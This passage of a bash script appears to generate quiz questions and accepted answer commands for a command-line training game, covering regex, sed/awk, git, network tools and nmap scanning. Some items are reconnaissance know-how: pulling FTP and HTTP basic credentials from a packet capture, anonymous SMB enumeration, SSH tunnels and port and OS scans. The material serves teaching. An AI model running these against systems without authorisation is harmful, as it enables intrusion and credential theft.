  questions+=("Find and grep all logs modified today§find /var/log -mtime 0 -type f -exec grep -l ${term} {} \\;§find /var/log -mtime 0 -type f -exec grep -l ${term} {} +§fd --changed-within 1d -t f . /var/log -x grep -l ${term}§fd --changed-within 1d -t f . /var/log -x rg -l ${term}")
}

# Level 22: Advanced Regex
gen_level22() {
  local -n questions=${1:-CURRENT_QUESTIONS}; questions=(); eval "local $_QV"; _ctx
  questions+=("Match 'error' followed by number in ${W}${log}${C}|grep -P 'error(?=\\d)' ${log}|grep -P 'error(?=[0-9])' ${log}|rg -P 'error(?=\\d)' ${log}|rg -P 'error(?=[0-9])' ${log}")
  questions+=("Match 'error' NOT followed by number in ${W}${log}${C}|grep -P 'error(?!\\d)' ${log}|grep -P 'error(?![0-9])' ${log}|rg -P 'error(?!\\d)' ${log}|rg -P 'error(?![0-9])' ${log}")
  questions+=("Match number preceded by '$' in ${W}${log}${C}|grep -P '(?<=\\$)\\d+' ${log}|grep -P '(?<=\\$)[0-9]+' ${log}|rg -P '(?<=\\$)\\d+' ${log}|rg -P '(?<=\\$)[0-9]+' ${log}")
  questions+=("Match number NOT preceded by '$' in ${W}${log}${C}|grep -P '(?<!\\$)\\d+' ${log}|grep -P '(?<!\\$)[0-9]+' ${log}|rg -P '(?<!\\$)\\d+' ${log}|rg -P '(?<!\\$)[0-9]+' ${log}")
  questions+=("Non-greedy match between quotes in ${W}${log}${C}|grep -oP '\".*?\"' ${log}|rg -oP '\".*?\"' ${log}|grep -oE '\"[^\"]*\"' ${log}|grep -o '\"[^\"]*\"' ${log}|rg -o '\"[^\"]*\"' ${log}")
  questions+=("Match shortest HTML tag in ${W}${txt}${C}|grep -oP '<.*?>' ${txt}|rg -oP '<.*?>' ${txt}|grep -oE '<[^>]*>' ${txt}|grep -o '<[^>]*>' ${txt}|rg -o '<[^>]*>' ${txt}")
  questions+=("Extract first word after colon in ${W}${log}${C}|grep -oP ':\\s*\\K\\S+' ${log}|rg -oP ':\\s*\\K\\S+' ${log}")
  questions+=("Match whole word 'error' only in ${W}${log}${C}|grep -w 'error' ${log}|grep --word-regexp 'error' ${log}|grep -P '\\berror\\b' ${log}|rg -w 'error' ${log}|rg --word-regexp 'error' ${log}|rg -P '\\berror\\b' ${log}|grep -w error ${log}|rg -w error ${log}")
  questions+=("Match 'error' but not 'errors' in ${W}${log}${C}|grep -P 'error(?!s)' ${log}|rg -P 'error(?!s)' ${log}")
  questions+=("Match lines starting with digit in ${W}${txt}${C}|grep '^[0-9]' ${txt}|grep '^[[:digit:]]' ${txt}|grep -P '^\\d' ${txt}|grep -E '^[0-9]' ${txt}|rg '^[0-9]' ${txt}|rg -P '^\\d' ${txt}")
  questions+=("Match lines ending with digit in ${W}${txt}${C}|grep '[0-9]$' ${txt}|grep '[[:digit:]]$' ${txt}|grep -P '\\d$' ${txt}|grep -E '[0-9]$' ${txt}|rg '[0-9]$' ${txt}|rg -P '\\d$' ${txt}")
  questions+=("Match empty lines in ${W}${txt}${C}|grep '^$' ${txt}|rg '^$' ${txt}|grep -E '^$' ${txt}")
  questions+=("Match any vowel in ${W}${txt}${C}|grep '[aeiou]' ${txt}|rg '[aeiou]' ${txt}|grep -E '[aeiou]' ${txt}")
  questions+=("Match non-digit in ${W}${txt}${C}|grep '[^0-9]' ${txt}|grep -P '\\D' ${txt}|grep '[^[:digit:]]' ${txt}|rg '[^0-9]' ${txt}|rg -P '\\D' ${txt}")
  questions+=("Match word character in ${W}${txt}${C}|grep -P '\\w' ${txt}|grep -E '\\w' ${txt}|grep '[[:alnum:]_]' ${txt}|rg '\\w' ${txt}")
  questions+=("Match whitespace in ${W}${txt}${C}|grep -P '\\s' ${txt}|grep -E '\\s' ${txt}|grep '[[:space:]]' ${txt}|rg '\\s' ${txt}")
  questions+=("Match hex character in ${W}${txt}${C}|grep '[0-9a-fA-F]' ${txt}|grep '[[:xdigit:]]' ${txt}|rg '[0-9a-fA-F]' ${txt}")
  questions+=("Match ${n} consecutive digits in ${W}${log}${C}|grep -E '[0-9]{${n}}' ${log}|grep -P '\\d{${n}}' ${log}|grep -E '[[:digit:]]{${n}}' ${log}|rg '[0-9]{${n}}' ${log}|rg -P '\\d{${n}}' ${log}|rg '[[:digit:]]{${n}}' ${log}")
  questions+=("Match ${n} or more digits in ${W}${log}${C}|grep -E '[0-9]{${n},}' ${log}|grep -P '\\d{${n},}' ${log}|rg '[0-9]{${n},}' ${log}|rg -P '\\d{${n},}' ${log}|grep -E '[[:digit:]]{${n},}' ${log}|rg '[[:digit:]]{${n},}' ${log}")
  questions+=("Match 2 to ${n3} digits in ${W}${log}${C}|grep -E '[0-9]{2,${n3}}' ${log}|grep -P '\\d{2,${n3}}' ${log}|rg '[0-9]{2,${n3}}' ${log}|rg -P '\\d{2,${n3}}' ${log}|grep -E '[[:digit:]]{2,${n3}}' ${log}|rg '[[:digit:]]{2,${n3}}' ${log}")
  questions+=("Match optional 's' (plurals) in ${W}${log}${C}|grep -E 'errors?' ${log}|rg 'errors?' ${log}|grep -P 'errors?' ${log}")
  questions+=("Match repeated word in ${W}${txt}${C}|grep -P '\\b(\\w+)\\s+\\1\\b' ${txt}|rg -P '\\b(\\w+)\\s+\\1\\b' ${txt}")
  questions+=("Match repeated character in ${W}${txt}${C}|grep -E '(.)\\1' ${txt}|rg -P '(.)\\1' ${txt}")
  questions+=("Capture and replace with sed in ${W}${log}${C}|sed -E 's/(error):\\s*(.*)/\\2 [\\1]/' ${log}|sed -r 's/(error):\\s*(.*)/\\2 [\\1]/' ${log}")
  questions+=("Swap two words in ${W}${txt}${C}|sed -E 's/(\\w+)\\s+(\\w+)/\\2 \\1/' ${txt}|sed -r 's/(\\w+)\\s+(\\w+)/\\2 \\1/' ${txt}")
  questions+=("Delete lines matching ${Y}${term}${C} in ${W}${txt}${C}|sed '/${term}/d' ${txt}|grep -v '${term}' ${txt}|rg -v '${term}' ${txt}|awk '!/${term}/' ${txt}")
  questions+=("Print only lines matching ${Y}${term}${C} in ${W}${txt}${C}|sed -n '/${term}/p' ${txt}|grep '${term}' ${txt}|rg '${term}' ${txt}|awk '/${term}/' ${txt}")
  questions+=("Replace ${Y}${old}${C} with ${Y}${new}${C} only on lines matching ${Y}${term}${C} in ${W}${log}${C}|sed '/${term}/s/${old}/${new}/g' ${log}|sed -E '/${term}/s/${old}/${new}/g' ${log}|sed -r '/${term}/s/${old}/${new}/g' ${log}")
  questions+=("Insert ${Y}'new entry'${C} before ${Y}${term}${C} match in ${W}${txt}${C}|sed '/${term}/i new entry' ${txt}|~^sed '/${term}/i .+' ${txt}$")
  questions+=("Insert ${Y}'new entry'${C} after ${Y}${term}${C} match in ${W}${txt}${C}|sed '/${term}/a new entry' ${txt}|~^sed '/${term}/a .+' ${txt}$")
  questions+=("Replace line matching ${Y}${term}${C} with ${Y}'replaced'${C} in ${W}${txt}${C}|sed '/${term}/c replaced' ${txt}|~^sed '/${term}/c .+' ${txt}$")
  questions+=("Multiple sed commands in ${W}${txt}${C}: ${old}->${new}, ${term}->fixed|sed -e 's/${old}/${new}/' -e 's/${term}/fixed/' ${txt}|sed 's/${old}/${new}/; s/${term}/fixed/' ${txt}")
  questions+=("Sed: replace ${Y}${old}${C} with ${Y}${new}${C} on lines ${n}-${n2} in ${W}${txt}${C}|sed '${n},${n2}s/${old}/${new}/g' ${txt}|sed -E '${n},${n2}s/${old}/${new}/g' ${txt}|sed -r '${n},${n2}s/${old}/${new}/g' ${txt}")
  questions+=("Delete from line ${n} to ${Y}${term}${C} match in ${W}${txt}${C}|sed '${n},/${term}/d' ${txt}|sed -E '${n},/${term}/d' ${txt}|sed -r '${n},/${term}/d' ${txt}")
  questions+=("Transform case (lowercase) in ${W}${txt}${C}|sed 's/.*/\\L&/' ${txt}|tr '[:upper:]' '[:lower:]' < ${txt}|awk '{print tolower(\$0)}' ${txt}|tr A-Z a-z < ${txt}")
  questions+=("Transform case (uppercase) in ${W}${txt}${C}|sed 's/.*/\\U&/' ${txt}|tr '[:lower:]' '[:upper:]' < ${txt}|awk '{print toupper(\$0)}' ${txt}|tr a-z A-Z < ${txt}")
  questions+=("Capitalize first letter in ${W}${txt}${C}|sed 's/.*/\\u&/' ${txt}|awk '{print toupper(substr(\$0,1,1)) substr(\$0,2)}' ${txt}")
  questions+=("Print lines where id > ${n2} in ${W}data.csv${C}|awk -F, '\$1 > ${n2}' data.csv|awk -F, 'NR>1 && \$1 > ${n2}' data.csv")
  questions+=("Print unique values from first column in ${W}${csv}${C}|awk -F, '!seen[\$1]++' ${csv}")
  questions+=("Find min id (skip header) in ${W}data.csv${C}|awk -F, 'NR==2{min=\$1} NR>1 && \$1<min{min=\$1} END{print min}' data.csv")
  questions+=("Conditional print in ${W}${csv}${C}|awk -F, '\$3==\"active\" {print \$1, \$2}' ${csv}")
  questions+=("Print with custom separator in ${W}${csv}${C}§awk -F, 'BEGIN{OFS=\"|\"} {print \$1,\$2}' ${csv}§awk -F, -v OFS='|' '{print \$1,\$2}' ${csv}")
  questions+=("String functions: length in ${W}${txt}${C}|awk '{print length(\$0)}' ${txt}|awk '{print length}' ${txt}")
  questions+=("String functions: substr in ${W}${txt}${C}|awk '{print substr(\$0,1,10)}' ${txt}|awk '{print substr(\$0, 1, 10)}' ${txt}")
  questions+=("Replace '${old}' with '${new}' using awk gsub in ${W}${txt}${C}|awk '{gsub(/${old}/,\"${new}\"); print}' ${txt}|awk '{gsub(/${old}/, \"${new}\"); print}' ${txt}|sed 's/${old}/${new}/g' ${txt}")
  questions+=("Split on ':' and print first field in ${W}${txt}${C}|awk '{n=split(\$0,a,\":\"); print a[1]}' ${txt}|awk -F: '{print \$1}' ${txt}|cut -d: -f1 ${txt}")
  questions+=("Print from '${term}' to '${term2}' pattern range in ${W}${txt}${C}|awk '/${term}/,/${term2}/' ${txt}|sed -n '/${term}/,/${term2}/p' ${txt}")
  questions+=("Print line numbers in ${W}${txt}${C}|awk '{print NR\": \"\$0}' ${txt}|cat -n ${txt}|cat --number ${txt}|nl ${txt}|grep -n '' ${txt}|rg -n '' ${txt}")
  questions+=("Skip header line in ${W}${csv}${C}|awk 'NR>1' ${csv}|tail -n +2 ${csv}|sed 1d ${csv}")
  questions+=("Print every nth line in ${W}${txt}${C}|awk 'NR%${n}==0' ${txt}|sed -n '0~${n}p' ${txt}")
  questions+=("Reverse fields in ${W}${txt}${C}|awk '{for(i=NF;i>0;i--) printf \"%s \",\$i; print \"\"}' ${txt}|awk '{for(i=NF; i>0; i--) printf \"%s \",\$i; print \"\"}' ${txt}")
  questions+=("Complex: extract, sort, count in ${W}${log}${C}§grep -oP '\\d+\\.\\d+\\.\\d+\\.\\d+' ${log} | sort | uniq -c | sort -rn§grep -oE '[0-9]+\\.[0-9]+\\.[0-9]+\\.[0-9]+' ${log} | sort | uniq -c | sort -rn§rg -oP '\\d+\\.\\d+\\.\\d+\\.\\d+' ${log} | sort | uniq -c | sort -rn§rg -o '[0-9]+\\.[0-9]+\\.[0-9]+\\.[0-9]+' ${log} | sort | uniq -c | sort -rn")
  questions+=("Complex: top N by frequency in ${W}${log}${C}§awk '{print \$1}' ${log} | sort | uniq -c | sort -rn | head -${n}§awk '{print \$1}' ${log} | sort | uniq -c | sort -nr | head -${n}§awk '{print \$1}' ${log} | sort | uniq -c | sort -rn | head -n ${n}")
  questions+=("Complex: join lines with comma in ${W}${txt}${C}|paste -sd',' ${txt}|paste -sd, ${txt}|paste -s -d',' ${txt}|paste -s -d, ${txt}|paste -s -d ',' ${txt}")
  questions+=("Compare sorted ${W}${txt}${C} vs sorted ${W}${txt2}${C} output|diff <(sort ${txt}) <(sort ${txt2})|diff -u <(sort ${txt}) <(sort ${txt2})|diff --unified <(sort ${txt}) <(sort ${txt2})")
  questions+=("Count lines matching ${Y}${term}${C} in ${W}${log}${C} (process substitution)§wc -l <(grep ${term} ${log})§grep ${term} ${log} | wc -l§wc -l <(rg ${term} ${log})§rg ${term} ${log} | wc -l§rg -c ${term} ${log}§grep -c ${term} ${log}§grep --count ${term} ${log}")
}

# Level 23: Git
gen_level23() {
  local -n questions=${1:-CURRENT_QUESTIONS}; questions=(); eval "local $_QV"; _ctx
  questions+=("Initialize new git repo|git init|git init .")
  questions+=("Clone repo from URL§~^git clone (https?://|git@)\\S+")
  questions+=("Clone repo to specific dir§~^git clone (https?://|git@)\\S+ \\S+")
  questions+=("Check repo status|git status|git status -s|git status --short")
  questions+=("Show current branch|git branch --show-current|git rev-parse --abbrev-ref HEAD")
  questions+=("Stage file '${txt}' for commit|git add ${txt}|git stage ${txt}")
  questions+=("Stage all tracked changed files|git add -u|git add --update")
  questions+=("Stage all files including untracked|git add -A|git add --all|git add .")
  questions+=("Stage interactively (hunks)|git add -p|git add --patch")
  questions+=("Commit with message|git commit -m \"message\"|git commit -m 'message'|~^git commit -m .+$")
  questions+=("Commit all tracked changes§git commit -am \"message\"§git commit -a -m \"message\"§git commit -am 'message'§git commit -a -m 'message'§~^git commit (-am?|-a -m) .+$")
  questions+=("Amend last commit message|git commit --amend -m \"new message\"|git commit --amend -m 'new message'|~^git commit --amend -m .+$")
  questions+=("Amend last commit (add files)|git commit --amend --no-edit")
  questions+=("List all branches|git branch -a|git branch --all")
  questions+=("Create new branch '${branch}'|git branch ${branch}")
  questions+=("Switch to branch '${branch}'|git checkout ${branch}|git switch ${branch}")
  questions+=("Create and switch to new branch '${branch}'|git checkout -b ${branch}|git switch -c ${branch}|git switch --create ${branch}")
  questions+=("Delete local branch '${branch}'|git branch -d ${branch}|git branch --delete ${branch}")
  questions+=("Force delete local branch '${branch}'|git branch -D ${branch}|git branch --delete --force ${branch}")
  questions+=("Delete remote branch '${branch}'|git push origin --delete ${branch}|git push origin :${branch}|git push origin -d ${branch}|git push --delete origin ${branch}")
  questions+=("Rename current branch to '${branch}'|git branch -m ${branch}|git branch --move ${branch}")
  questions+=("Add remote origin|~^git remote add origin .+")
  questions+=("List remotes|git remote -v|git remote --verbose|git remote")
  questions+=("Fetch from remote|git fetch origin|git fetch|git fetch --all")
  questions+=("Pull branch '${branch}' from remote|git pull origin ${branch}")
  questions+=("Push branch '${branch}' to remote|git push origin ${branch}")
  questions+=("Push and set upstream|git push -u origin ${branch}|git push --set-upstream origin ${branch}")
  questions+=("Force push (dangerous)|git push --force origin ${branch}|git push -f origin ${branch}")
  questions+=("Force push safely (fail if remote changed)|git push --force-with-lease origin ${branch}")
  questions+=("Show commit log|git log|git log --all")
  questions+=("Show log one line per commit|git log --oneline")
  questions+=("Show log with graph|git log --oneline --graph --all|git log --graph --oneline --all|git log --graph --all --oneline|git log --oneline --graph --all --decorate|git log --graph --oneline --all --decorate")
  questions+=("Show last ${n} commits|git log -${n}|git log -n ${n}|git log --max-count=${n}|git log --max-count ${n}")
  questions+=("Show diff of unstaged changes|git diff")
  questions+=("Show diff of staged changes|git diff --staged|git diff --cached")
  questions+=("Show diff between branches|git diff main..${branch}|git diff main ${branch}|git diff main...${branch}|git diff ${branch}..main|git diff ${branch} main|git diff ${branch}...main")
  questions+=("Show who changed each line in ${W}${txt}${C}|git blame ${txt}|git annotate ${txt}")
  questions+=("Search commits for '${term}'|git log -S '${term}'|git log -S \"${term}\"|git log -S ${term}|git log --all -S '${term}'|git log --all -S \"${term}\"|git log --all -S ${term}")
  questions+=("Show ${W}${txt}${C} at specific commit|git show HEAD~${n}:${txt}")
  questions+=("Unstage file '${txt}'|git reset HEAD ${txt}|git restore --staged ${txt}|git reset ${txt}|git restore -S ${txt}")
  questions+=("Discard changes to file '${txt}'|git checkout -- ${txt}|git restore ${txt}|git checkout ${txt}|git restore -- ${txt}")
  questions+=("Reset to last commit (keep changes)|git reset --soft HEAD~1|git reset --soft HEAD^|git reset --soft HEAD~")
  questions+=("Reset to last commit (discard changes)|git reset --hard HEAD~1|git reset --hard HEAD^|git reset --hard HEAD~")
  questions+=("Revert a commit (new commit)|git revert HEAD|git revert --no-edit HEAD")
  questions+=("Stash changes|git stash|git stash push")
  questions+=("Stash with message§git stash push -m \"message\"§git stash save \"message\"§git stash push -m 'message'§git stash save 'message'§~^git stash (push -m|save) .+$")
  questions+=("Apply latest stash (keep in stash list)|git stash apply|git stash apply stash@{0}")
  questions+=("Apply latest stash and remove from stash list|git stash pop|git stash pop stash@{0}")
  questions+=("List stashes|git stash list")
  questions+=("Apply specific stash (keep in list)|git stash apply stash@{${n}}")
  questions+=("Apply and remove specific stash|git stash pop stash@{${n}}")
  questions+=("Merge branch '${branch}' into current|git merge ${branch}")
  questions+=("Rebase current onto main|git rebase main")
  questions+=("Continue rebase after conflict|git rebase --continue")
  questions+=("Abort rebase|git rebase --abort")
  questions+=("Cherry-pick a commit|~^git cherry-pick [0-9a-f]+")
  questions+=("Squash last ${n} commits|git rebase -i HEAD~${n}|git rebase --interactive HEAD~${n}")
  questions+=("List tags|git tag|git tag -l|git tag --list")
  questions+=("Create lightweight tag|~^git tag v[0-9]")
  questions+=("Create annotated tag|~^git tag -a v[0-9].* -m ")
  questions+=("Push tags to remote|git push --tags|git push origin --tags")
  questions+=("Delete a tag§~^git tag (-d|--delete) v[0-9]")
  questions+=("Set user name globally|~^git config --global user\\.name .+")
  questions+=("Set user email globally|~^git config --global user\\.email .+@.+")
  questions+=("List all config|git config --list|git config -l")
  questions+=("Set default branch name|git config --global init.defaultBranch main")
  questions+=("Find commit that introduced bug|~^git bisect start")
  questions+=("Clean untracked files (dry run)|git clean -n|git clean --dry-run")
  questions+=("Clean untracked files|git clean -f|git clean --force")
  questions+=("Clean untracked files and dirs|git clean -fd|git clean -df|git clean -f -d|git clean --force -d|git clean -d --force")
  questions+=("Show reflog|git reflog|git reflog show")
  questions+=("Recover deleted branch from reflog§~^git (checkout -b|switch -c|switch --create|branch) \\S+ ([0-9a-f]+|HEAD@\\{[0-9]+\\})")
}

# Level 24: Network Tools
gen_level24() {
  local -n questions=${1:-CURRENT_QUESTIONS}; questions=(); eval "local $_QV"; _ctx
  local key=data  # export.json only has .data array
  questions+=("Capture traffic on ${iface} to ${pcap}|tshark -i ${iface} -w ${pcap}|sudo tshark -i ${iface} -w ${pcap}|tcpdump -i ${iface} -w ${pcap}|sudo tcpdump -i ${iface} -w ${pcap}|tcpdump -w ${pcap} -i ${iface}|sudo tcpdump -w ${pcap} -i ${iface}|tshark -w ${pcap} -i ${iface}|sudo tshark -w ${pcap} -i ${iface}")
  questions+=("Capture only 100 packets to ${W}${pcap}${C}|tshark -i ${iface} -c 100 -w ${pcap}|sudo tshark -i ${iface} -c 100 -w ${pcap}|tcpdump -i ${iface} -c 100 -w ${pcap}|sudo tcpdump -i ${iface} -c 100 -w ${pcap}")
  questions+=("Read and display ${pcap}|tshark -r ${pcap}|tcpdump -r ${pcap}")
  questions+=("Filter HTTP traffic from ${pcap}|tshark -r ${pcap} -Y http|tcpdump -r ${pcap} port 80|tcpdump -r ${pcap} 'tcp port 80'")
  questions+=("Filter traffic to/from ${ip} in ${W}${pcap}${C}|tshark -r ${pcap} -Y 'ip.addr == ${ip}'|tcpdump -r ${pcap} host ${ip}|tcpdump -r ${pcap} 'host ${ip}'|tshark -r ${pcap} -Y \"ip.addr == ${ip}\"")
  questions+=("Show DNS queries in ${W}${pcap}${C}|tshark -r ${pcap} -Y dns|tshark -r ${pcap} -Y 'dns.qry.name'|tcpdump -r ${pcap} port 53|tcpdump -r ${pcap} 'port 53'")
  questions+=("Extract HTTP POST data in ${W}${pcap}${C}|tshark -r ${pcap} -Y 'http.request.method == POST' -T fields -e http.file_data")
  questions+=("Extract all URLs from ${W}${pcap}${C}|tshark -r ${pcap} -Y 'http.request' -T fields -e http.host -e http.request.uri")
  questions+=("Show TCP conversations in ${W}${pcap}${C}|tshark -r ${pcap} -q -z conv,tcp")
  questions+=("Extract credentials (FTP, HTTP basic) in ${W}${pcap}${C}§tshark -r ${pcap} -Y 'ftp.request.command == PASS || http.authbasic'")
  questions+=("Pretty print JSON file|jq '.' data/export.json|jq . data/export.json|python3 -m json.tool data/export.json|jq '.' < data/export.json|jq . < data/export.json|cat data/export.json | jq '.'|cat data/export.json | jq .")
  questions+=("Extract '${key}' array from JSON|jq '.${key}' data/export.json|jq '.${key}' < data/export.json|cat data/export.json | jq '.${key}'")
  questions+=("Extract first item from '${key}' array|jq '.${key}[0]' data/export.json|jq '.${key}[0]' < data/export.json|cat data/export.json | jq '.${key}[0]'")
  questions+=("Extract 'name' field from each item§jq '.${key}[] | .name' data/export.json§jq '.${key}[] | .name' < data/export.json§jq '.${key}[].name' data/export.json")
  questions+=("Filter items where status is 'active'§jq '.${key}[] | select(.status == \"active\")' data/export.json§jq '.${key}[] | select(.status==\"active\")' data/export.json§jq '[.${key}[] | select(.status == \"active\")]' data/export.json")
  questions+=("Count items in array§jq '.${key} | length' data/export.json§jq '.${key} | length' < data/export.json§jq '.${key}|length' data/export.json")
  questions+=("Get keys of JSON object|jq 'keys' data/export.json|jq 'keys' < data/export.json|jq '. | keys' data/export.json")
  questions+=("Compact JSON (remove whitespace)|jq -c '.' data/export.json|jq --compact-output '.' data/export.json")
  questions+=("Raw string output (no quotes) for 'name' field§jq -r '.${key}[0].name' data/export.json§jq --raw-output '.${key}[0].name' data/export.json")
  questions+=("Create new object from fields§jq '.${key}[] | {name: .name, id: .id}' data/export.json§jq '.${key}[] | {name: .name, id: .id}' < data/export.json§cat data/export.json | jq '.${key}[] | {name: .name, id: .id}'")
  questions+=("Fetch ${url}/api and extract '${key}' array with ${Y}jq${C}§curl -s ${url}/api | jq '.${key}'§curl --silent ${url}/api | jq '.${key}'§curl -sL ${url}/api | jq '.${key}'§curl -Ls ${url}/api | jq '.${key}'§wget -qO- ${url}/api | jq '.${key}'")
  questions+=("GET request to ${url}|curl ${url}|curl -s ${url}|wget -qO- ${url}")
  questions+=("GET request with headers shown|curl -i ${url}|curl --include ${url}")
  questions+=("POST JSON data|curl -X POST -H 'Content-Type: application/json' -d '{\"key\":\"value\"}' ${url}/api|curl -H 'Content-Type: application/json' -d '{\"key\":\"value\"}' ${url}/api|curl -X POST --header 'Content-Type: application/json' --data '{\"key\":\"value\"}' ${url}/api|curl --header 'Content-Type: application/json' --data '{\"key\":\"value\"}' ${url}/api")
  questions+=("POST form data|curl -X POST -d 'user=admin&pass=test' ${url}/login|curl -d 'user=admin&pass=test' ${url}/login|curl --data 'user=admin&pass=test' ${url}/login|curl --request POST -d 'user=admin&pass=test' ${url}/login|curl --request POST --data 'user=admin&pass=test' ${url}/login|curl -X POST --data 'user=admin&pass=test' ${url}/login")
  questions+=("Follow redirects|curl -L ${url}|curl --location ${url}|curl -sL ${url}|curl -Ls ${url}|curl --location --silent ${url}")
  questions+=("Save output to file|curl -o output.html ${url}|curl --output output.html ${url}|curl ${url} > output.html|wget -O output.html ${url}|wget --output-document=output.html ${url}")
  questions+=("Send with custom header|curl -H 'Authorization: Bearer token123' ${url}/api|curl --header 'Authorization: Bearer token123' ${url}/api")
  questions+=("Silent mode (no progress)|curl -s ${url}|curl --silent ${url}")
  questions+=("Download file with original name|curl -O ${url}/file.tar.gz|curl --remote-name ${url}/file.tar.gz|wget ${url}/file.tar.gz|curl -LO ${url}/file.tar.gz")
  questions+=("Connect to remote host via SSH|ssh ${user}@${host}")
  questions+=("SSH as ${user} on port ${port}|ssh -p ${port} ${user}@${host}|ssh -p${port} ${user}@${host}|ssh ${user}@${host} -p ${port}|ssh ${user}@${host} -p${port}")
  questions+=("Generate SSH key pair|ssh-keygen|ssh-keygen -t ed25519|ssh-keygen -t rsa|ssh-keygen -t rsa -b 4096|ssh-keygen -t ed25519 -C ''|ssh-keygen -t ed25519 -C \"\"")
  questions+=("Copy SSH key to remote host|ssh-copy-id ${user}@${host}|ssh-copy-id -i ~/.ssh/id_ed25519.pub ${user}@${host}|ssh-copy-id -i ~/.ssh/id_rsa.pub ${user}@${host}")
  questions+=("SSH local port forward: access remote ${port} via local 8080|ssh -L 8080:localhost:${port} ${user}@${host}|ssh -NL 8080:localhost:${port} ${user}@${host}|ssh -L8080:localhost:${port} ${user}@${host}|ssh -NL8080:localhost:${port} ${user}@${host}|ssh -L 8080:127.0.0.1:${port} ${user}@${host}|ssh -NL 8080:127.0.0.1:${port} ${user}@${host}|ssh -L 8080:localhost:${port} -N ${user}@${host}")
  questions+=("SSH remote port forward: expose local ${port} on remote|ssh -R ${port}:localhost:${port} ${user}@${host}|ssh -NR ${port}:localhost:${port} ${user}@${host}|ssh -R${port}:localhost:${port} ${user}@${host}|ssh -NR${port}:localhost:${port} ${user}@${host}")
  questions+=("SSH dynamic SOCKS proxy on port 1080|ssh -D 1080 ${user}@${host}|ssh -ND 1080 ${user}@${host}|ssh -DN 1080 ${user}@${host}|ssh -D1080 ${user}@${host}|ssh -ND1080 ${user}@${host}")
  questions+=("SSH through jump host to target|ssh -J ${user}@jump ${user}@target|ssh -o ProxyJump=${user}@jump ${user}@target")
  questions+=("SSH tunnel in background|ssh -fN -L 8080:localhost:${port} ${user}@${host}|ssh -fNL 8080:localhost:${port} ${user}@${host}|ssh -f -N -L 8080:localhost:${port} ${user}@${host}")
  questions+=("SSH execute remote command|ssh ${user}@${host} 'ls -la'|ssh ${user}@${host} \"ls -la\"|ssh ${user}@${host} ls -la")
  questions+=("SCP ${W}${txt}${C} to remote|scp ${txt} ${user}@${host}:/tmp/|scp ${txt} ${user}@${host}:/tmp|scp ${txt} ${user}@${host}:~|scp ${txt} ${user}@${host}:~/|scp ${txt} ${user}@${host}:")
  questions+=("Rsync ${W}${txt}${C} with progress|rsync -avz --progress ${txt} ${user}@${host}:/backup/|rsync -avzP ${txt} ${user}@${host}:/backup/")
  questions+=("Download file|wget ${url}/file.tar.gz|curl -O ${url}/file.tar.gz|curl --remote-name ${url}/file.tar.gz")
  questions+=("Continue interrupted download|wget -c ${url}/large.iso|wget --continue ${url}/large.iso|curl -C - -O ${url}/large.iso")
  questions+=("Mirror website for offline|wget -mk ${url}|wget --mirror -k ${url}|wget -m --convert-links ${url}|wget --mirror --convert-links ${url}")
  questions+=("Check SSL cert of website|openssl s_client -connect ${host}:443|openssl s_client -connect ${host}:443 < /dev/null|echo | openssl s_client -connect ${host}:443")
  questions+=("Generate random 32-byte hex string|openssl rand -hex 32")
  questions+=("Encrypt file with AES-256|openssl enc -aes-256-cbc -pbkdf2 -salt -in file.txt -out file.enc")
  questions+=("Decrypt AES-256 file|openssl enc -d -aes-256-cbc -pbkdf2 -in file.enc -out file.txt")
  questions+=("Generate RSA key pair|openssl genrsa -out key.pem 4096")
  questions+=("List SMB shares anonymously on ${ip}|smbclient -L //${ip} -N|smbclient -N -L //${ip}|smbclient -L //${ip} --no-pass|smbclient --no-pass -L //${ip}|smbclient -L ${ip} -N|smbclient -N -L ${ip}")
  questions+=("Connect to SMB share|smbclient //${ip}/share -U ${user}")
  questions+=("Enumerate SMB with enum4linux|enum4linux -a ${ip}")
}

# Level 25: Network Scanning (nmap)
gen_level25() {
  local -n questions=${1:-CURRENT_QUESTIONS}; questions=(); eval "local $_QV"; _ctx
  local port2=$((port + 1000))
  questions+=("Scan all 65535 ports on ${ip}|nmap -p- ${ip}|nmap -p 1-65535 ${ip}|nmap -p1-65535 ${ip}|sudo nmap -p- ${ip}|sudo nmap -p 1-65535 ${ip}|sudo nmap -p1-65535 ${ip}")
  questions+=("Scan top 100 most common ports on ${ip}|nmap --top-ports 100 ${ip}|sudo nmap --top-ports 100 ${ip}|nmap -F ${ip}|sudo nmap -F ${ip}")
  questions+=("Scan specific ports ${port},${port2} on ${ip}|nmap -p ${port},${port2} ${ip}|nmap -p${port},${port2} ${ip}|sudo nmap -p ${port},${port2} ${ip}|sudo nmap -p${port},${port2} ${ip}|nmap -p ${port2},${port} ${ip}|nmap -p${port2},${port} ${ip}|sudo nmap -p ${port2},${port} ${ip}|sudo nmap -p${port2},${port} ${ip}")
  questions+=("Scan port range 1-1000 on ${ip}|nmap -p 1-1000 ${ip}|nmap -p1-1000 ${ip}|sudo nmap -p 1-1000 ${ip}|sudo nmap -p1-1000 ${ip}")
  questions+=("Scan for open HTTP/HTTPS ports on ${ip}|nmap -p 80,443 ${ip}|nmap -p80,443 ${ip}|nmap -p 443,80 ${ip}|nmap -p443,80 ${ip}|sudo nmap -p 80,443 ${ip}|sudo nmap -p80,443 ${ip}|sudo nmap -p 443,80 ${ip}|sudo nmap -p443,80 ${ip}")
  questions+=("Detect service versions (banner grab) on ${ip}|nmap -sV ${ip}|sudo nmap -sV ${ip}|nmap -sV --version-intensity 5 ${ip}|sudo nmap -sV --version-intensity 5 ${ip}")
  questions+=("OS fingerprinting via TCP/IP stack on ${ip}|nmap -O ${ip}|sudo nmap -O ${ip}")
  questions+=("Aggressive scan (-A = OS, version, scripts, traceroute)|nmap -A ${ip}|sudo nmap -A ${ip}")
  questions+=("Run default NSE scripts (-sC) on ${ip}|nmap -sC ${ip}|nmap --script=default ${ip}|nmap --script default ${ip}|sudo nmap -sC ${ip}|sudo nmap --script=default ${ip}|sudo nmap --script default ${ip}")
  questions+=("Combined recon: version + scripts on ${ip}|nmap -sV -sC ${ip}|nmap -sC -sV ${ip}|nmap -sCV ${ip}|nmap -sVC ${ip}|sudo nmap -sV -sC ${ip}|sudo nmap -sC -sV ${ip}|sudo nmap -sCV ${ip}|sudo nmap -sVC ${ip}")
  questions+=("UDP scan top 20 ports on ${ip}|nmap -sU --top-ports 20 ${ip}|sudo nmap -sU --top-ports 20 ${ip}|nmap --top-ports 20 -sU ${ip}|sudo nmap --top-ports 20 -sU ${ip}")
  questions+=("TCP connect scan on ${ip} (full handshake)|nmap -sT ${ip}|sudo nmap -sT ${ip}")
